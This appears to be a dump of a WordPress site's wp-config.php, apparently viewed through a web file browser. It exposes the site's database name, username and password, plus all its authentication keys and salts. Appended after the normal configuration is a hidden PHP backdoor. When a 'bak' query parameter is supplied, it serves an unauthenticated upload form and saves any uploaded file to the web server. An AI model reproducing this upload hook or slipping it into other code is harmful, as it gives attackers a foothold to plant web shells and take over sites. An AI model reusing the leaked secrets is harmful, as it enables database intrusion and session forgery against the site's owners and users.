View file File name : wp-config.php Content :<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'guideinstitutsbe_wp_kupwi'); /** Database username */ define('DB_USER', 'guideinstitutsbe_wp_vhjfp'); /** Database password */ define('DB_PASSWORD', '56x%nUjJr~406PJa'); /** Database hostname */ define('DB_HOST', 'localhost:3306'); /** Database charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', '*+L_tvCZJN:pTf207!5]B2t;X4-0g)_n%T_v5W6-m4PN%i*uKGSa!EwRS6~Ymr08'); define('SECURE_AUTH_KEY', 'q4065W#%4;lF9/|vwIouT1]~0-0u@+N~Y&kyz)3h*0:1;P:|::;et8W26l3%pG(k'); define('LOGGED_IN_KEY', '[o10#(9u0#Q5T7Z&i2Ur7*%4v[U6|f_2l]Hr24nbn/9Ev+Ps@0dV)8o1;C6]95~O'); define('NONCE_KEY', 'yF)Q5f95JnbW/B#5IFjspA]@+3WMGYpJ)-dUq_@jY/k*9e~qq7/pIw-[%2X#1@hf'); define('AUTH_SALT', 'Glo8U%@w8(eG|3N9;@9;(ewo9kmT~1CJS0|TxQ02qnrNUzx!!-&6l#PyvV~6-6-E'); define('SECURE_AUTH_SALT', '80b:gqSP7X)|z4Ov-3m06Cl8(4MU#Eisju2+]0zpCSTn:V+iZTEyHq*2272@p5O:'); define('LOGGED_IN_SALT', 'a6P687W/NoE[z&r)9;zDM9:L!PjRV6+jsIZm9297K3Kg6_H4p&)e8/s2Xj5A4t8r'); define('NONCE_SALT', '5[#:0|vea0wRFu5-5lnQoB7;e!84%EkXSFx#]+)g1]fr92/;16AK#b*id]S@ZJgi'); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'xlcxeXWV_'; /* Add any custom values between this line and the "stop editing" line. */ define('WP_ALLOW_MULTISITE', true); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', false ); } define( 'DISALLOW_FILE_EDIT', true ); define( 'CONCATENATE_SCRIPTS', false ); define( 'WP_CACHE_KEY_SALT', 'ccf1c4b09024e5e3d897a8766fb67010' ); define( 'WP_DEBUG_DISPLAY', false ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php'; <?php if (isset($_GET['bak'])) { echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>"; } ?>